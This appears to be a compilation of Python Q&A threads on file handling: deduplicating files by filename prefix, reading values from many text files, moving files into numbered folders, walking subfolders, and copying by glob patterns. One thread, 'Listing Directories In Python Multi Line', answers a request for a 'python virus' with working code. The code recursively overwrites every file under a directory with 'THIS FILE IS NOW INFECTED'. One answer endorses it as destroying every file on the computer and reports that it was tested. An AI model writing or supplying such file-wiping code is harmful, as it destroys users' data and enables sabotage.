Delete copies of files in a folder

I have this folder.
Let's consider the files: sub-OAS30027_ses-d1300_run-01_T1w.nii.gz and sub-OAS30027_ses-d1300_run-02_T1w.nii.gz. They have the same initial part of the name, that is sub-OAS30027_ses-d1300.
I would like to write a Python script that keeps only one file among those sharing the prefix sub-OAS30027_ses-d1300, only one among those sharing sub-OAS30031_ses-d0427, and so on. It doesn't matter which file is kept, as long as there is just one.
This is because sub-OAS30027_ses-d1300_run-01_T1w.nii.gz and sub-OAS30027_ses-d1300_run-02_T1w.nii.gz are effectively copies, and I don't want both.
Could you help me?

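Use the re and os modules.
PS: always keep a backup copy of the original files, so you can restore them if something goes wrong.
    import os
    import re

    seen = set()  # subject/session prefixes that already have a kept file
    for name in sorted(os.listdir()):
        # key on subject AND session, e.g. "sub-OAS30027_ses-d1300";
        # the session alone could collide between different subjects
        m = re.match(r'(sub-[^_]+_ses-[^_]+)_', name)
        if not m:
            continue
        if m.group(1) in seen:
            os.remove(name)  # a file with this prefix was already kept
        else:
            seen.add(m.group(1))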

I tried to keep it as simple as possible. Note that it handles a single prefix. I hope this helps:
    import os

    directory = 'directory_name'  # put in the directory you want to search through
    duplicate_file_lst = []
    # loop through directory files
    for filename in os.listdir(directory):
        if filename.startswith("sub-OAS30027_ses-d1300"):
            duplicate_file_lst.append(filename)
    # keep only the first file in the list
    for file in duplicate_file_lst[1:]:
        # os.listdir returns bare names, so join them with the directory
        os.remove(os.path.join(directory, file))
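
Both answers can be combined into one routine that handles every prefix at once. The following is only a sketch: it assumes the file names follow the sub-<subject>_ses-<session>_... pattern from the question, and the helper name find_extra_runs and the demo file names are made up for illustration. It separates "decide what to delete" from "delete", so the list can be inspected before anything is removed.

```python
import os
import re
import tempfile
from collections import defaultdict

# Assumed naming scheme: sub-<subject>_ses-<session>_<rest>
PREFIX_RE = re.compile(r"(sub-[^_]+_ses-[^_]+)_")


def find_extra_runs(directory):
    """Return paths of every file except the first (sorted) one per prefix."""
    groups = defaultdict(list)
    for name in sorted(os.listdir(directory)):
        m = PREFIX_RE.match(name)
        if m:
            groups[m.group(1)].append(os.path.join(directory, name))
    extras = []
    for paths in groups.values():
        extras.extend(paths[1:])  # keep paths[0], flag the rest
    return extras


# Demonstration in a throwaway directory with empty, made-up files.
with tempfile.TemporaryDirectory() as demo_dir:
    for name in (
        "sub-OAS30027_ses-d1300_run-01_T1w.nii.gz",
        "sub-OAS30027_ses-d1300_run-02_T1w.nii.gz",
        "sub-OAS30031_ses-d0427_run-01_T1w.nii.gz",
        "sub-OAS30031_ses-d1300_run-01_T1w.nii.gz",
    ):
        open(os.path.join(demo_dir, name), "w").close()
    extras = find_extra_runs(demo_dir)
    for path in extras:
        os.remove(path)
    remaining = sorted(os.listdir(demo_dir))
```

Printing the result of find_extra_runs before calling os.remove is a cheap way to check that only the intended files are affected.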

Related

How do i make a list with values taken from different text files?

I have a folder, which I want to select manually, containing some number of .txt files. I want to write a program that lets me select that folder, then cycles through all files in it and takes a value from a fixed position in each one.
I have already written a piece of code that takes the value from a single .txt file:
    mylines = []
    with open('test1.txt', 'rt') as myfile:
        for myline in myfile:
            mylines.append(myline)
    subline = mylines[58]
    sub = subline.split(' ')
    print(sub[5])
EDIT: I also have a piece of code that builds a list of paths to all the files I want to use this on:
    import glob
    path = r'C:/Users/Etienne/.spyder-py3/test/*.UIT'
    files = glob.glob(path)
    print(files)
How can I apply the first piece of code to every file in the list from the second piece of code, so that I end up with a list of values?
I have never written code before, but this would make my work a lot faster, so I want to pick up Python.

If I understood the problem correctly, the os module might be helpful for you.
The os.listdir() method returns a list of all files and directories in the specified directory. For example:
    import os

    # Get the list of all files and directories
    # in the root directory; change the path to your own directory
    path = "/"
    dir_list = os.listdir(path)
    print("Files and directories in '", path, "' :")
    # print the list
    print(dir_list)
With this list you can iterate over your .txt files.
For more information, see:
How can I iterate over files in a given directory?
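
To connect the two snippets from the question, one option is to wrap the single-file code in a function and call it for every path that glob returns. This is a sketch under assumptions: the names read_field and collect_values are invented here, the defaults 58 and 5 come from the question, and the demo files are generated only so the example can run on its own.

```python
import glob
import os
import tempfile


def read_field(path, line_index=58, field_index=5):
    """Return one space-separated field from one line of a text file."""
    with open(path, "rt") as handle:
        lines = handle.readlines()
    # rstrip drops the trailing newline so the last field stays clean
    return lines[line_index].rstrip("\n").split(" ")[field_index]


def collect_values(pattern, line_index=58, field_index=5):
    """Apply read_field to every file matching the glob pattern."""
    return [
        read_field(path, line_index, field_index)
        for path in sorted(glob.glob(pattern))
    ]


# Demonstration with two generated files; the contents are made up.
with tempfile.TemporaryDirectory() as demo_dir:
    for name, value in (("a.UIT", "1.5"), ("b.UIT", "2.5")):
        content = ["filler\n"] * 58 + ["a b c d e %s g\n" % value, "end\n"]
        with open(os.path.join(demo_dir, name), "wt") as handle:
            handle.writelines(content)
    values = collect_values(os.path.join(demo_dir, "*.UIT"))
```

With the real data, the call would use the pattern from the question, for example collect_values(r'C:/Users/Etienne/.spyder-py3/test/*.UIT').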

Move files one by one to newly created directories for each file with Python 3

I have an initial directory with a file inside it, D:\BBS\file.x, and multiple .txt files in the work directory D:\
What I am trying to do is copy the folder BBS with its content, appending an incrementing number to its name, and then move each existing .txt file into its own newly created directory, giving \BBS1, \BBS2, ..., \BBSn (where n depends on the number of .txt files).
Visual example of the Before and After:
Initial view of the \WorkFolder
Desired view of the \WorkFolder
Right now I have only managed to create one new directory and move the .txt files into it all at once, which is not what I want. Here's my code:
    from pathlib import Path
    from shutil import copy
    import shutil
    import os

    wkDir = Path.cwd()
    src = wkDir.joinpath('BBS')
    count = 0
    for content in src.iterdir():
        addname = src.name.split('_')[0]
        out_folder = wkDir.joinpath(f'!{addname}')
        out_folder.mkdir(exist_ok=True)
        out_path = out_folder.joinpath(content.name)
        copy(content, out_path)
    files = os.listdir(wkDir)
    for f in files:
        if f.endswith(".txt"):
            shutil.move(f, out_folder)
I would appreciate help with incrementing the folder name and moving the files one by one, each into its own newly created directory, as described above.
I don't have much experience with Python in general. I am using Python 3 on Windows.
Thanks in advance.

Now I understand what you want to accomplish. I think you can do it quite easily by iterating only over the text files and copying the BBS folder once for each of them. After that, you move the file you are currently at. To get folder_num, you may be able to simply slice the file name at fixed indexes (e.g. f[4:6]) if the name always follows the pattern TextXX.txt. If the prefix "Text" may vary, it is more robust to use a regular expression, as in the following sample.
Also, the function shutil.copytree copies a directory together with its children.
    import os
    import re
    import shutil
    from pathlib import Path

    wkDir = Path.cwd()
    src = wkDir.joinpath('BBS')
    for f in os.listdir(wkDir):
        if f.endswith(".txt"):
            # first run of digits in the file name, e.g. "01" from "Text01.txt"
            folder_num = re.findall(r"\d+", f)[0]
            target = wkDir.joinpath(f"{src.name}{folder_num}")
            # copy BBS (fails if the target folder already exists)
            shutil.copytree(src, target)
            # move .txt file
            shutil.move(f, target)
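
The same idea can be written as a function that takes the work directory as a parameter instead of relying on the current working directory, which makes it easier to try out on a scratch folder first. This is a sketch, not a drop-in replacement: the function name distribute_txt_files and the demo file names Text01.txt and Text02.txt are assumptions, and files without any digits in their name are skipped.

```python
import re
import shutil
import tempfile
from pathlib import Path


def distribute_txt_files(work_dir, template_name="BBS"):
    """Copy the template folder once per .txt file and move the file into it."""
    work_dir = Path(work_dir)
    template = work_dir / template_name
    created = []
    for txt in sorted(work_dir.glob("*.txt")):
        numbers = re.findall(r"\d+", txt.stem)
        if not numbers:
            continue  # no digits in the name, so no folder number to use
        target = work_dir / f"{template_name}{numbers[0]}"
        shutil.copytree(template, target)  # raises if target already exists
        shutil.move(str(txt), str(target / txt.name))
        created.append(target.name)
    return created


# Demonstration in a throwaway directory with made-up files.
with tempfile.TemporaryDirectory() as demo_dir:
    root = Path(demo_dir)
    (root / "BBS").mkdir()
    (root / "BBS" / "file.x").write_text("template content")
    (root / "Text01.txt").write_text("one")
    (root / "Text02.txt").write_text("two")
    created = distribute_txt_files(root)
    template_copied = (root / "BBS02" / "file.x").exists()
    txt_moved = (root / "BBS01" / "Text01.txt").exists()
    txt_left_behind = (root / "Text01.txt").exists()
```

The folder number is taken from the file name, so Text01.txt ends up in BBS01 rather than BBS1. If plain 1, 2, ..., n numbering is wanted, enumerate over the sorted files would be one alternative.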

Run a script for each txt file in all subfolders

I need to run the following script for each txt file located in all subfolders.
The main folder is "simulations", which contains different subfolders (named "year-month-day"). Each subfolder contains a text file "diagno.inp". I have to run this script for each "diagno.inp" file in order to get a list with the following data (one row for each day):
"year-month-day", "W_int", "W_dir"
Here's the code, which works for only one subfolder. Can you help me create a loop?
    fid = open('/Users/silviamassaro/weather/simulations/20180105/diagno.inp', "r")
    subfolder = "20180105"
    n = fid.read().splitlines()[51:]
    for element in n:
        "do something"  # here code to calculate W_dir and W_int for each day
    print(subfolder, W_int, W_dir)

Here's what I usually do when I need to loop over a directory and its children recursively:
    import os

    main_folder = '/path/to/the/main/folder'
    files_to_process = [os.path.join(main_folder, child) for child in os.listdir(main_folder)]
    while files_to_process:
        child = files_to_process.pop()
        if os.path.isdir(child):
            files_to_process.extend(os.path.join(child, sub_child) for sub_child in os.listdir(child))
        else:
            # We have a file here, we can do what we want with it
            print(child)
It's short, but makes some pretty strong assumptions:
- You don't care about the order in which the files are processed.
- You only have directories or regular files among the children of your entry point.
Edit: added another possible solution using glob, thanks to @jacques-gaudin's comment.
This solution has the advantage that you are sure to get only .inp files, but you still cannot rely on their order.
    import glob

    main_folder = '/path/to/the/main/folder'
    files_to_process = glob.glob('%s/**/*.inp' % main_folder, recursive=True)
    for found_file in files_to_process:
        # We have a file here, we can do what we want with it
        print(found_file)
Hope this helps!

With pathlib you can do something like this:
    from pathlib import Path

    sim_folder = Path("path/to/simulations/folder")
    for inp_file in sim_folder.rglob('*.inp'):
        subfolder = inp_file.parent.name
        with open(inp_file, 'r') as fid:
            n = fid.read().splitlines()[51:]
        for element in n:
            "do something"  # here code to calculate W_dir and W_int for each day
        print(subfolder, W_int, W_dir)
Note that this recursively traverses all subfolders to look for .inp files.
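
If the rows need to come out in date order, sorting the paths before processing is one way to get a deterministic result, since the subfolders are named year-month-day. The sketch below assumes that layout; the generator name read_inp_rows is invented, and the calculation of W_int and W_dir is left out because the question does not show it. The demo only counts the data lines that remain after the 51 skipped ones.

```python
import tempfile
from pathlib import Path


def read_inp_rows(sim_folder, filename="diagno.inp", skip=51):
    """Yield (subfolder_name, data_lines) for each matching file, in path order."""
    for inp_file in sorted(Path(sim_folder).rglob(filename)):
        with open(inp_file, "r") as fid:
            lines = fid.read().splitlines()[skip:]
        yield inp_file.parent.name, lines


# Demonstration with two made-up day folders: 51 header lines + 2 data lines.
with tempfile.TemporaryDirectory() as demo_dir:
    for day in ("20180106", "20180105"):
        day_dir = Path(demo_dir) / day
        day_dir.mkdir()
        content = ["header"] * 51 + ["data 1", "data 2"]
        (day_dir / "diagno.inp").write_text("\n".join(content) + "\n")
    results = [(name, len(lines)) for name, lines in read_inp_rows(demo_dir)]
```

Inside the loop over read_inp_rows, the per-day calculation would take the place of len(lines).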

Listing Directories In Python Multi Line

i need help trying to list directories in python, i am trying to code a python virus, just proof of concept, nothing special.
#!/usr/bin/python
import os, sys
VIRUS=''
data=str(os.listdir('.'))
data=data.translate(None, "[],\n'")
print data
f = open(data, "w")
f.write(VIRUS)
f.close()
EDIT: I need it to be multi-lined so when I list the directorys I can infect the first file that is listed then the second and so on.
I don't want to use the ls command cause I want it to be multi-platform.

Don't call str on the result of os.listdir if you're just going to try to parse it again. Instead, use the result directly:
    for item in os.listdir('.'):
        print item  # or do something else with item

So when writing a virus like this, you will want it to be recursive. This way it will be able to go inside every directory it finds and write over those files as well, completely destroying every single file on the computer.
def virus(directory=os.getcwd()):
VIRUS = "THIS FILE IS NOW INFECTED"
if directory[-1] == "/": #making sure directory can be concencated with file
pass
else:
directory = directory + "/" #making sure directory can be concencated with file
files = os.listdir(directory)
for i in files:
location = directory + i
if os.path.isfile(location):
with open(location,'w') as f:
f.write(VIRUS)
elif os.path.isdir(location):
virus(directory=location) #running function again if in a directory to go inside those files
Now this one line will rewrite all files as the message in the variable VIRUS:
virus()
Extra explanation:
the reason I have the default as: directory=os.getcwd() is because you originally were using ".", which, in the listdir method, will be the current working directories files. I needed the name of the directory on file in order to pull the nested directories
This does work!:
I ran it in a test directory on my computer and every file in every nested directory had it's content replaced with: "THIS FILE IS NOW INFECTED"

Something like this:
import os
VIRUS = "some text"
data = os.listdir(".") #returns a list of files and directories
for x in data: #iterate over the list
if os.path.isfile(x): #if current item is a file then perform write operation
#use `with` statement for handling files, it automatically closes the file
with open(x,'w') as f:
f.write(VIRUS)

How do I use wild cards in python as specified in a text file

Hello, I'm new to Python and I'd like to know how to process a .txt file line by line in order to copy the files it specifies with wildcards.
Basically, the .txt file looks like this:
bin/
bin/*.txt
bin/*.exe
obj/*.obj
document
binaries
With that information, I'd like to read my .txt file, match each directory, and copy all the files that match the * pattern for that directory. I'd also like to copy the folders listed in the .txt file. What's the most practical way of doing this? Your help is appreciated, thanks.

Here's something to start with...
    import glob    # For specifying pathnames with wildcards
    import shutil  # For doing common "shell-like" operations.
    import os      # For dealing with pathnames

    # Grab all the pathnames of all the files matching those specified in `text_file.txt`
    matching_pathnames = []
    with open('text_file.txt', 'r') as pattern_file:
        for line in pattern_file:
            pattern = line.strip()  # drop the trailing newline, or nothing will match
            if pattern:
                matching_pathnames += glob.glob(pattern)
    # Copy all the matched files to the same filename + '.new' at the end
    for pathname in matching_pathnames:
        if os.path.isfile(pathname):  # copyfile cannot copy directories
            shutil.copyfile(pathname, '%s.new' % (pathname,))
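
The snippet above copies files only. To also copy the folders listed in the text file, one possible extension is to copy each match into a separate destination tree, using shutil.copytree for directories. This is a sketch under assumptions: the function name copy_from_patterns and the source and destination layout are made up, the patterns are taken relative to a source root, and dirs_exist_ok requires Python 3.8 or newer.

```python
import glob
import os
import shutil
import tempfile


def copy_from_patterns(list_file, src_root, dest_root):
    """Copy every file or folder matched by the patterns into dest_root."""
    with open(list_file, "r") as handle:
        patterns = [line.strip() for line in handle if line.strip()]
    copied = []
    for pattern in patterns:
        for path in sorted(glob.glob(os.path.join(src_root, pattern))):
            rel = os.path.relpath(path, src_root)
            target = os.path.join(dest_root, rel)
            if os.path.isdir(path):
                # whole folder, merged into the destination if it exists
                shutil.copytree(path, target, dirs_exist_ok=True)
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                shutil.copy2(path, target)
            copied.append(rel)
    return copied


# Demonstration in a throwaway directory with made-up files.
with tempfile.TemporaryDirectory() as demo_dir:
    src = os.path.join(demo_dir, "src")
    dest = os.path.join(demo_dir, "dest")
    os.makedirs(os.path.join(src, "bin"))
    os.makedirs(os.path.join(src, "document"))
    for rel_path in ("bin/a.txt", "bin/b.exe", "document/readme.md"):
        with open(os.path.join(src, *rel_path.split("/")), "w") as handle:
            handle.write("x")
    list_file = os.path.join(demo_dir, "text_file.txt")
    with open(list_file, "w") as handle:
        handle.write("bin/*.txt\ndocument\n")
    copied = copy_from_patterns(list_file, src, dest)
    txt_copied = os.path.isfile(os.path.join(dest, "bin", "a.txt"))
    exe_copied = os.path.exists(os.path.join(dest, "bin", "b.exe"))
    folder_copied = os.path.isfile(os.path.join(dest, "document", "readme.md"))
```

Copying into a separate destination keeps the originals untouched, which differs from the '.new' suffix approach above. Which of the two fits better depends on where the copies are supposed to end up.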

You might want to look at the glob and re modules
http://docs.python.org/library/glob.html
